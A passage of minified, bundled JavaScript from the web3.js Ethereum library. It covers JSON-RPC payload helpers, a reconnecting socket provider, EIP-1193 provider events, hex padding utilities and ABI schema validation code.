                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                }, s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.jsonRpc = void 0, o(r(7086), t), o(r(4578), t), o(r(3065), t), o(r(3561), t), o(r(4822), t), o(r(2557), t), o(r(7151), t), o(r(3718), t), o(r(9250), t), t.jsonRpc = s(r(9250)), o(r(6982), t), o(r(4108), t), o(r(7717), t), o(r(997), t), o(r(222), t), o(r(7541), t);
            },
            9250: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBatchRequest = t.toBatchPayload = t.toPayload = t.setRequestIdStart = t.isBatchResponse = t.isValidResponse = t.validateResponse = t.isSubscriptionResult = t.isResponseWithNotification = t.isResponseWithError = t.isResponseWithResult = t.isResponseRpcError = void 0;
                const n = r(7345), i = r(5071), o = r(7717);
                let s;
                t.isResponseRpcError = (e)=>{
                    const t = e.error.code;
                    return i.rpcErrorsMap.has(t) || t >= -32099 && t <= -32000;
                }, t.isResponseWithResult = (e)=>!Array.isArray(e) && !!e && "2.0" === e.jsonrpc && "result" in e && (0, n.isNullish)(e.error) && ("number" == typeof e.id || "string" == typeof e.id), t.isResponseWithError = (e)=>!Array.isArray(e) && "2.0" === e.jsonrpc && !!e && (0, n.isNullish)(e.result) && "error" in e && ("number" == typeof e.id || "string" == typeof e.id), t.isResponseWithNotification = (e)=>!(Array.isArray(e) || !e || "2.0" !== e.jsonrpc || (0, n.isNullish)(e.params) || (0, n.isNullish)(e.method)), t.isSubscriptionResult = (e)=>!Array.isArray(e) && !!e && "2.0" === e.jsonrpc && "id" in e && "result" in e, t.validateResponse = (e)=>(0, t.isResponseWithResult)(e) || (0, t.isResponseWithError)(e), t.isValidResponse = (e)=>Array.isArray(e) ? e.every(t.validateResponse) : (0, t.validateResponse)(e), t.isBatchResponse = (e)=>Array.isArray(e) && e.length > 0 && (0, t.isValidResponse)(e), t.setRequestIdStart = (e)=>{
                    s = e;
                }, t.toPayload = (e)=>{
                    var t, r, n, i;
                    return void 0 !== s && (s += 1), {
                        jsonrpc: null !== (t = e.jsonrpc) && void 0 !== t ? t : "2.0",
                        id: null !== (n = null !== (r = e.id) && void 0 !== r ? r : s) && void 0 !== n ? n : (0, o.uuidV4)(),
                        method: e.method,
                        params: null !== (i = e.params) && void 0 !== i ? i : void 0
                    };
                }, t.toBatchPayload = (e)=>e.map((e)=>(0, t.toPayload)(e)), t.isBatchRequest = (e)=>Array.isArray(e) && e.length > 0;
            },
            7151: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.mergeDeep = void 0;
                const n = r(9970), i = r(7345), o = (e)=>!("object" != typeof e || (0, i.isNullish)(e) || Array.isArray(e) || e instanceof n.TypedArray);
                t.mergeDeep = (e, ...r)=>{
                    const s = e;
                    if (!o(s)) return s;
                    for (const e of r)for(const r in e)o(e[r]) ? (s[r] || (s[r] = {}), (0, t.mergeDeep)(s[r], e[r])) : !(0, i.isNullish)(e[r]) && Object.hasOwnProperty.call(e, r) && (Array.isArray(e[r]) || e[r] instanceof n.TypedArray ? s[r] = e[r].slice(0) : s[r] = e[r]);
                    return s;
                };
            },
            3718: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.rejectIfConditionAtInterval = t.rejectIfTimeout = t.pollTillDefined = t.waitWithTimeout = t.isPromise = void 0;
                const i = r(7345);
                function o(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        const i = yield Promise.race([
                            e instanceof Promise ? e : e(),
                            new Promise((e, i)=>{
                                n = setTimeout(()=>r ? i(r) : e(void 0), t);
                            })
                        ]);
                        if (n && clearTimeout(n), i instanceof Error) throw i;
                        return i;
                    });
                }
                t.isPromise = function(e) {
                    return ("object" == typeof e || "function" == typeof e) && "function" == typeof e.then;
                }, t.waitWithTimeout = o, t.pollTillDefined = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = o(e, t);
                        let s;
                        const a = new Promise((r, a)=>{
                            s = setInterval(()=>{
                                (()=>{
                                    n(this, void 0, void 0, function*() {
                                        try {
                                            const n = yield o(e, t);
                                            (0, i.isNullish)(n) || (clearInterval(s), r(n));
                                        } catch (e) {
                                            clearInterval(s), a(e);
                                        }
                                    });
                                })();
                            }, t);
                        }), u = yield r;
                        return (0, i.isNullish)(u) ? a : (s && clearInterval(s), u);
                    });
                }, t.rejectIfTimeout = function(e, t) {
                    let r;
                    const n = new Promise((n, i)=>{
                        r = setTimeout(()=>{
                            i(t);
                        }, e);
                    });
                    return [
                        r,
                        n
                    ];
                }, t.rejectIfConditionAtInterval = function(e, t) {
                    let r;
                    const i = new Promise((i, o)=>{
                        r = setInterval(()=>{
                            (()=>{
                                n(this, void 0, void 0, function*() {
                                    const t = yield e();
                                    t && (clearInterval(r), o(t));
                                });
                            })();
                        }, t);
                    });
                    return [
                        r,
                        i
                    ];
                };
            },
            4822: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.randomHex = t.randomBytes = void 0;
                const n = r(1341), i = r(7086);
                t.randomBytes = (e)=>(0, n.getRandomBytesSync)(e), t.randomHex = (e)=>(0, i.bytesToHex)((0, t.randomBytes)(e));
            },
            222: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SocketProvider = void 0;
                const a = r(5071), u = r(997), c = r(4108), l = r(4578), d = r(6982), h = o(r(9250)), f = {
                    autoReconnect: !0,
                    delay: 5e3,
                    maxAttempts: 5
                };
                class p extends u.Eip1193Provider {
                    constructor(e, t, r){
                        if (super(), this._connectionStatus = "connecting", this._onMessageHandler = this._onMessage.bind(this), this._onOpenHandler = this._onConnect.bind(this), this._onCloseHandler = this._onCloseEvent.bind(this), this._onErrorHandler = this._onError.bind(this), !this._validateProviderPath(e)) throw new a.InvalidClientError(e);
                        this._socketPath = e, this._socketOptions = t, this._reconnectOptions = Object.assign(Object.assign({}, f), null != r ? r : {}), this._pendingRequestsQueue = new Map, this._sentRequestsQueue = new Map, this._init(), this.connect(), this.chunkResponseParser = new c.ChunkResponseParser(this._eventEmitter, this._reconnectOptions.autoReconnect), this.chunkResponseParser.onError(()=>{
                            this._clearQueues();
                        }), this.isReconnecting = !1;
                    }
                    get SocketConnection() {
                        return this._socketConnection;
                    }
                    _init() {
                        this._reconnectAttempts = 0;
                    }
                    connect() {
                        try {
                            this._openSocketConnection(), this._connectionStatus = "connecting", this._addSocketListeners();
                        } catch (e) {
                            if (!this.isReconnecting) throw this._connectionStatus = "disconnected", e && e.message ? new a.ConnectionError(`Error while connecting to ${this._socketPath}. Reason: ${e.message}`) : new a.InvalidClientError(this._socketPath);
                            setImmediate(()=>{
                                this._reconnect();
                            });
                        }
                    }
                    _validateProviderPath(e) {
                        return !!e;
                    }
                    supportsSubscriptions() {
                        return !0;
                    }
                    on(e, t) {
                        this._eventEmitter.on(e, t);
                    }
                    once(e, t) {
                        this._eventEmitter.once(e, t);
                    }
                    removeListener(e, t) {
                        this._eventEmitter.removeListener(e, t);
                    }
                    _onDisconnect(e, t) {
                        this._connectionStatus = "disconnected", super._onDisconnect(e, t);
                    }
                    disconnect(e, t) {
                        const r = null != e ? e : 1e3;
                        this._removeSocketListeners(), "disconnected" !== this.getStatus() && this._closeSocketConnection(r, t), this._onDisconnect(r, t);
                    }
                    removeAllListeners(e) {
                        this._eventEmitter.removeAllListeners(e);
                    }
                    _onError(e) {
                        this.isReconnecting ? this._reconnect() : this._eventEmitter.emit("error", e);
                    }
                    reset() {
                        this._sentRequestsQueue.clear(), this._pendingRequestsQueue.clear(), this._init(), this._removeSocketListeners(), this._addSocketListeners();
                    }
                    _reconnect() {
                        this.isReconnecting || (this.isReconnecting = !0, this._sentRequestsQueue.size > 0 && this._sentRequestsQueue.forEach((e, t)=>{
                            e.deferredPromise.reject(new a.PendingRequestsOnReconnectingError), this._sentRequestsQueue.delete(t);
                        }), this._reconnectAttempts < this._reconnectOptions.maxAttempts ? (this._reconnectAttempts += 1, setTimeout(()=>{
                            this._removeSocketListeners(), this.connect(), this.isReconnecting = !1;
                        }, this._reconnectOptions.delay)) : (this.isReconnecting = !1, this._clearQueues(), this._removeSocketListeners(), this._eventEmitter.emit("error", new a.MaxAttemptsReachedOnReconnectingError(this._reconnectOptions.maxAttempts))));
                    }
                    request(e) {
                        return s(this, void 0, void 0, function*() {
                            if ((0, l.isNullish)(this._socketConnection)) throw new Error("Connection is undefined");
                            "disconnected" === this.getStatus() && this.connect();
                            const t = h.isBatchRequest(e) ? e[0].id : e.id;
                            if (!t) throw new a.Web3WSProviderError("Request Id not defined");
                            if (this._sentRequestsQueue.has(t)) throw new a.RequestAlreadySentError(t);
                            const r = new d.Web3DeferredPromise;
                            r.catch((e)=>{
                                this._eventEmitter.emit("error", e);
                            });
                            const n = {
                                payload: e,
                                deferredPromise: r
                            };
                            if ("connecting" === this.getStatus()) return this._pendingRequestsQueue.set(t, n), n.deferredPromise;
                            this._sentRequestsQueue.set(t, n);
                            try {
                                this._sendToSocket(n.payload);
                            } catch (e) {
                                this._sentRequestsQueue.delete(t), this._eventEmitter.emit("error", e);
                            }
                            return r;
                        });
                    }
                    _onConnect() {
                        this._connectionStatus = "connected", this._reconnectAttempts = 0, super._onConnect(), this._sendPendingRequests();
                    }
                    _sendPendingRequests() {
                        for (const [e, t] of this._pendingRequestsQueue.entries())this._sendToSocket(t.payload), this._pendingRequestsQueue.delete(e), this._sentRequestsQueue.set(e, t);
                    }
                    _onMessage(e) {
                        const t = this._parseResponses(e);
                        if (0 !== t.length) for (const e of t){
                            if (h.isResponseWithNotification(e) && e.method.endsWith("_subscription")) return void this._eventEmitter.emit("message", e);
                            const t = h.isBatchResponse(e) ? e[0].id : e.id, r = this._sentRequestsQueue.get(t);
                            if (!r) return;
                            (h.isBatchResponse(e) || h.isResponseWithResult(e) || h.isResponseWithError(e)) && (this._eventEmitter.emit("message", e), r.deferredPromise.resolve(e)), this._sentRequestsQueue.delete(t);
                        }
                        else this._reconnectOptions.autoReconnect && this._reconnect();
                    }
                    _clearQueues(e) {
                        this._pendingRequestsQueue.size > 0 && this._pendingRequestsQueue.forEach((t, r)=>{
                            t.deferredPromise.reject(new a.ConnectionNotOpenError(e)), this._pendingRequestsQueue.delete(r);
                        }), this._sentRequestsQueue.size > 0 && this._sentRequestsQueue.forEach((t, r)=>{
                            t.deferredPromise.reject(new a.ConnectionNotOpenError(e)), this._sentRequestsQueue.delete(r);
                        }), this._removeSocketListeners();
                    }
                }
                t.SocketProvider = p;
            },
            2557: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.fromTwosComplement = t.toTwosComplement = t.leftPad = t.rightPad = t.padRight = t.padLeft = void 0;
                const n = r(5071), i = r(7345), o = r(7086);
                t.padLeft = (e, t, r = "0")=>"string" == typeof e ? (0, i.isHexStrict)(e) ? i.utils.padLeft(e, t, r) : e.padStart(t, r) : (i.validator.validate([
                        "int"
                    ], [
                        e
                    ]), i.utils.padLeft(e, t, r)), t.padRight = (e, t, r = "0")=>{
                    if ("string" == typeof e && !(0, i.isHexStrict)(e)) return e.padEnd(t, r);
                    i.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    const n = "string" == typeof e && (0, i.isHexStrict)(e) ? e : (0, o.numberToHex)(e), s = n.startsWith("-") ? 3 : 2;
                    return n.padEnd(t + s, r);
                }, t.rightPad = t.padRight, t.leftPad = t.padLeft, t.toTwosComplement = (e, r = 64)=>{
                    i.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    const s = (0, o.toNumber)(e);
                    if (s >= 0) return (0, t.padLeft)((0, o.toHex)(s), r);
                    const a = BigInt(2) ** BigInt(4 * r);
                    if (-s >= a) throw new n.NibbleWidthError(`value: ${e}, nibbleWidth: ${r}`);
                    const u = BigInt(s) + a;
                    return (0, t.padLeft)((0, o.numberToHex)(u), r);
                }, t.fromTwosComplement = (e, t = 64)=>{
                    i.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    const r = (0, o.toNumber)(e);
                    if (r < 0) return r;
                    const s = Math.ceil(Math.log(Number(r)) / Math.log(2));
                    if (s > 4 * t) throw new n.NibbleWidthError(`value: "${e}", nibbleWidth: "${t}"`);
                    if (4 * t !== s) return r;
                    const a = BigInt(2) ** (BigInt(t) * BigInt(4));
                    return (0, o.toNumber)(BigInt(r) - a);
                };
            },
            7541: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.uint8ArrayEquals = t.uint8ArrayConcat = void 0, t.uint8ArrayConcat = function(...e) {
                    const t = e.reduce((e, t)=>e + t.length, 0), r = new Uint8Array(t);
                    let n = 0;
                    for (const t of e)r.set(t, n), n += t.length;
                    return r;
                }, t.uint8ArrayEquals = function(e, t) {
                    if (e === t) return !0;
                    if (e.byteLength !== t.byteLength) return !1;
                    for(let r = 0; r < e.byteLength; r += 1)if (e[r] !== t[r]) return !1;
                    return !0;
                };
            },
            7717: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.uuidV4 = void 0;
                const n = r(7086), i = r(4822);
                t.uuidV4 = ()=>{
                    const e = (0, i.randomBytes)(16);
                    e[6] = 15 & e[6] | 64, e[8] = 63 & e[8] | 128;
                    const t = (0, n.bytesToHex)(e);
                    return [
                        t.substring(2, 10),
                        t.substring(10, 14),
                        t.substring(14, 18),
                        t.substring(18, 22),
                        t.substring(22, 34)
                    ].join("-");
                };
            },
            4578: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isNullish = t.compareBlockNumbers = t.isTopicInBloom = t.isTopic = t.isContractAddressInBloom = t.isUserEthereumAddressInBloom = t.isInBloom = t.isBloom = t.isAddress = t.checkAddressCheckSum = t.isHex = t.isHexStrict = void 0;
                const n = r(5071), i = r(7345), o = r(9970);
                t.isHexStrict = i.isHexStrict, t.isHex = i.isHex, t.checkAddressCheckSum = i.checkAddressCheckSum, t.isAddress = i.isAddress, t.isBloom = i.isBloom, t.isInBloom = i.isInBloom, t.isUserEthereumAddressInBloom = i.isUserEthereumAddressInBloom, t.isContractAddressInBloom = i.isContractAddressInBloom, t.isTopic = i.isTopic, t.isTopicInBloom = i.isTopicInBloom, t.compareBlockNumbers = (e, t)=>{
                    const r = "string" == typeof e && (0, i.isBlockTag)(e), s = "string" == typeof t && (0, i.isBlockTag)(t);
                    if (e === t || ("earliest" === e || 0 === e) && ("earliest" === t || 0 === t)) return 0;
                    if ("earliest" === e && t > 0) return -1;
                    if ("earliest" === t && e > 0) return 1;
                    if (r && s) {
                        const r = {
                            [o.BlockTags.EARLIEST]: 1,
                            [o.BlockTags.FINALIZED]: 2,
                            [o.BlockTags.SAFE]: 3,
                            [o.BlockTags.LATEST]: 4,
                            [o.BlockTags.PENDING]: 5
                        };
                        return r[e] < r[t] ? -1 : 1;
                    }
                    if (r && !s || !r && s) throw new n.InvalidBlockError("Cannot compare blocktag with provided non-blocktag input.");
                    const a = BigInt(e), u = BigInt(t);
                    return a < u ? -1 : a === u ? 0 : 1;
                }, t.isNullish = i.isNullish;
            },
            6982: function(e, t, r) {
                "use strict";
                var n, i = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3DeferredPromise = void 0;
                const o = r(5071);
                t.Web3DeferredPromise = class {
                    constructor({ timeout: e, eagerStart: t, timeoutMessage: r } = {
                        timeout: 0,
                        eagerStart: !1,
                        timeoutMessage: "DeferredPromise timed out"
                    }){
                        this[n] = "Promise", this._state = "pending", this._promise = new Promise((e, t)=>{
                            this._resolve = e, this._reject = t;
                        }), this._timeoutMessage = r, this._timeoutInterval = e, t && this.startTimer();
                    }
                    get state() {
                        return this._state;
                    }
                    then(e, t) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.then(e, t);
                        });
                    }
                    catch(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.catch(e);
                        });
                    }
                    finally(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.finally(e);
                        });
                    }
                    resolve(e) {
                        this._resolve(e), this._state = "fulfilled", this._clearTimeout();
                    }
                    reject(e) {
                        this._reject(e), this._state = "rejected", this._clearTimeout();
                    }
                    startTimer() {
                        this._timeoutInterval && this._timeoutInterval > 0 && (this._timeoutId = setTimeout(this._checkTimeout.bind(this), this._timeoutInterval));
                    }
                    _checkTimeout() {
                        "pending" === this._state && this._timeoutId && this.reject(new o.OperationTimeoutError(this._timeoutMessage));
                    }
                    _clearTimeout() {
                        this._timeoutId && clearTimeout(this._timeoutId);
                    }
                }, n = Symbol.toStringTag;
            },
            997: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Eip1193Provider = void 0;
                const i = r(9970), o = r(2699), s = r(9250);
                class a extends i.Web3BaseProvider {
                    constructor(){
                        super(...arguments), this._eventEmitter = new o.EventEmitter, this._chainId = "", this._accounts = [];
                    }
                    _getChainId() {
                        var e;
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.request((0, s.toPayload)({
                                method: "eth_chainId",
                                params: []
                            }));
                            return null !== (e = null == t ? void 0 : t.result) && void 0 !== e ? e : "";
                        });
                    }
                    _getAccounts() {
                        var e;
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.request((0, s.toPayload)({
                                method: "eth_accounts",
                                params: []
                            }));
                            return null !== (e = null == t ? void 0 : t.result) && void 0 !== e ? e : [];
                        });
                    }
                    _onConnect() {
                        Promise.all([
                            this._getChainId().then((e)=>{
                                e !== this._chainId && (this._chainId = e, this._eventEmitter.emit("chainChanged", this._chainId));
                            }).catch((e)=>{
                                console.error(e);
                            }),
                            this._getAccounts().then((e)=>{
                                this._accounts.length === e.length && e.every((t)=>e.includes(t)) || (this._accounts = e, this._onAccountsChanged());
                            }).catch((e)=>{
                                console.error(e);
                            })
                        ]).then(()=>this._eventEmitter.emit("connect", {
                                chainId: this._chainId
                            })).catch((e)=>{
                            console.error(e);
                        });
                    }
                    _onDisconnect(e, t) {
                        this._eventEmitter.emit("disconnect", {
                            code: e,
                            data: t
                        });
                    }
                    _onAccountsChanged() {
                        this._eventEmitter.emit("accountsChanged", this._accounts);
                    }
                }
                t.Eip1193Provider = a;
            },
            1438: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.VALID_ETH_BASE_TYPES = void 0, t.VALID_ETH_BASE_TYPES = [
                    "bool",
                    "int",
                    "uint",
                    "bytes",
                    "string",
                    "address",
                    "tuple"
                ];
            },
            3637: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validator = void 0;
                const n = r(7985);
                t.validator = new n.Web3Validator;
            },
            356: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3ValidatorError = void 0;
                const n = r(5071), i = r(2102), o = (e)=>e.message && e.instancePath && e.params && !(0, i.isNullish)(e.params.value) ? `value "${e.params.value}" at "${e.instancePath}" ${e.message}` : e.message && e.instancePath ? `value at "${e.instancePath}" ${e.message}` : e.instancePath ? `value at "${e.instancePath}" caused unspecified error` : e.message ? e.message : "unspecified error";
                class s extends n.BaseWeb3Error {
                    constructor(e){
                        super(), this.code = n.ERR_VALIDATION, this.errors = e, super.message = `Web3 validator found ${e.length} error[s]:\n${this._compileErrors().join("\n")}`;
                    }
                    _compileErrors() {
                        return this.errors.map(o);
                    }
                }
                t.Web3ValidatorError = s;
            },
            2677: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const n = r(2681), i = r(6660), o = r(5191), s = r(4416), a = r(3921), u = r(5164), c = r(7420), l = r(6378), d = {
                    address: (e)=>(0, n.isAddress)(e),
                    bloom: (e)=>(0, o.isBloom)(e),
                    blockNumber: (e)=>(0, i.isBlockNumber)(e),
                    blockTag: (e)=>(0, i.isBlockTag)(e),
                    blockNumberOrTag: (e)=>(0, i.isBlockNumberOrTag)(e),
                    bool: (e)=>(0, s.isBoolean)(e),
                    bytes: (e)=>(0, a.isBytes)(e),
                    filter: (e)=>(0, u.isFilterObject)(e),
                    hex: (e)=>(0, c.isHexStrict)(e),
                    uint: (e)=>(0, l.isUInt)(e),
                    int: (e)=>(0, l.isInt)(e),
                    number: (e)=>(0, l.isNumber)(e),
                    string: (e)=>(0, c.isString)(e)
                };
                for(let e = 3; e <= 8; e += 1){
                    const t = 2 ** e;
                    d[`int${t}`] = (e)=>(0, l.isInt)(e, {
                            bitSize: t
                        }), d[`uint${t}`] = (e)=>(0, l.isUInt)(e, {
                            bitSize: t
                        });
                }
                for(let e = 1; e <= 32; e += 1)d[`bytes${e}`] = (t)=>(0, a.isBytes)(t, {
                        size: e
                    });
                t.default = d;
            },
            7345: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                }, s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.utils = void 0, o(r(7985), t), o(r(3637), t), o(r(5421), t), t.utils = s(r(8171)), o(r(356), t), o(r(1438), t), o(r(1851), t);
            },
            5421: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8171: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hexToUint8Array = t.uint8ArrayToHexString = t.padLeft = t.numberToHex = t.hexToNumber = t.codePointToInt = t.transformJsonDataToAbiFormat = t.fetchArrayElement = t.ethAbiToJsonSchema = t.abiSchemaToJsonSchema = t.parseBaseType = void 0;
                const n = r(5071), i = r(1438), o = r(1283), s = r(7420), a = r(356), u = [
                    "hex",
                    "number",
                    "blockNumber",
                    "blockNumberOrTag",
                    "filter",
                    "bloom"
                ];
                t.parseBaseType = (e)=>{
                    let t, r = e.replace(/ /, ""), n = !1, o = [];
                    if (e.includes("[") && (r = r.slice(0, r.indexOf("[")), o = [
                        ...e.matchAll(/(?:\[(\d*)\])/g)
                    ].map((e)=>parseInt(e[1], 10)).map((e)=>Number.isNaN(e) ? -1 : e), n = o.length > 0), i.VALID_ETH_BASE_TYPES.includes(r)) return {
                        baseType: r,
                        isArray: n,
                        baseTypeSize: t,
                        arraySizes: o
                    };
                    if (r.startsWith("int")) t = parseInt(r.substring(3), 10), r = "int";
                    else if (r.startsWith("uint")) t = parseInt(e.substring(4), 10), r = "uint";
                    else {
                        if (!r.startsWith("bytes")) return {
                            baseType: void 0,
                            isArray: !1,
                            baseTypeSize: void 0,
                            arraySizes: o
                        };
                        t = parseInt(r.substring(5), 10), r = "bytes";
                    }
                    return {
                        baseType: r,
                        isArray: n,
                        baseTypeSize: t,
                        arraySizes: o
                    };
                };
                const c = (e, r = {})=>{
                    if (Object.keys(r).includes("type")) throw new a.Web3ValidatorError([
                        {
                            keyword: "eth",
                            message: 'Either "eth" or "type" can be presented in schema',
                            params: {
                                eth: e
                            },
                            instancePath: "",
                            schemaPath: ""
                        }
                    ]);
                    const { baseType: n, baseTypeSize: i } = (0, t.parseBaseType)(e);
                    if (!n && !u.includes(e)) throw new a.Web3ValidatorError([
                        {
                            keyword: "eth",
                            message: `Eth data type "${e}" is not valid`,
                            params: {
                                eth: e
                            },
                            instancePath: "",
                            schemaPath: ""
                        }
                    ]);
                    if (n) {
                        if ("tuple" === n) throw new Error('"tuple" type is not implemented directly.');
                        return {
                            format: `${n}${null != i ? i : ""}`,
                            required: !0
                        };
                    }
                    return e ? {
                        format: e,
                        required: !0
                    } : {};
                };
                t.abiSchemaToJsonSchema = (e, r = "/0")=>{
                    const n = {
                        type: "array",
                        items: [],
                        maxItems: e.length,
                        minItems: e.length
                    };
                    for (const [i, s] of e.entries()){
                        let e, a, u = [];
                        (0, o.isAbiParameterSchema)(s) ? (e = s.type, a = s.name, u = s.components) : "string" == typeof s ? (e = s, a = `${r}/${i}`) : Array.isArray(s) && (s[0] && "string" == typeof s[0] && s[0].startsWith("tuple") && !Array.isArray(s[0]) && s[1] && Array.isArray(s[1]) ? (e = s[0], a = `${r}/${i}`, u = s[1]) : (e = "tuple", a = `${r}/${i}`, u = s));
                        const { baseType: l, isArray: d, arraySizes: h } = (0, t.parseBaseType)(e);
                        let f, p = n;
                        for(let e = h.length - 1; e > 0; e -= 1)f = {
                            type: "array",
                            items: [],
                            maxItems: h[e],
                            minItems: h[e]
                        }, h[e] < 0 && (delete f.maxItems, delete f.minItems), p.items = f, p = f;
                        if ("tuple" !== l || d) {
                            if ("tuple" === l && d) {
                                const e = h[0], r = {
                                    $id: a,
                                    type: "array",
                                    items: (0, t.abiSchemaToJsonSchema)(u, a),
                                    maxItems: e,
                                    minItems: e
                                };
                                e < 0 && (delete r.maxItems, delete r.minItems), p.items.push(r);
                            } else if (d) {
                                const e = h[0], t = {
                                    type: "array",
                                    $id: a,
                                    items: c(String(l)),
                                    minItems: e,
                                    maxItems: e
                                };
                                e < 0 && (delete t.maxItems, delete t.minItems), p.items.push(t);
                            } else Array.isArray(p.items) ? p.items.push(Object.assign({
                                $id: a
                            }, c(e))) : p.items.items.push(Object.assign({
                                $id: a
                            }, c(e)));
                        } else {
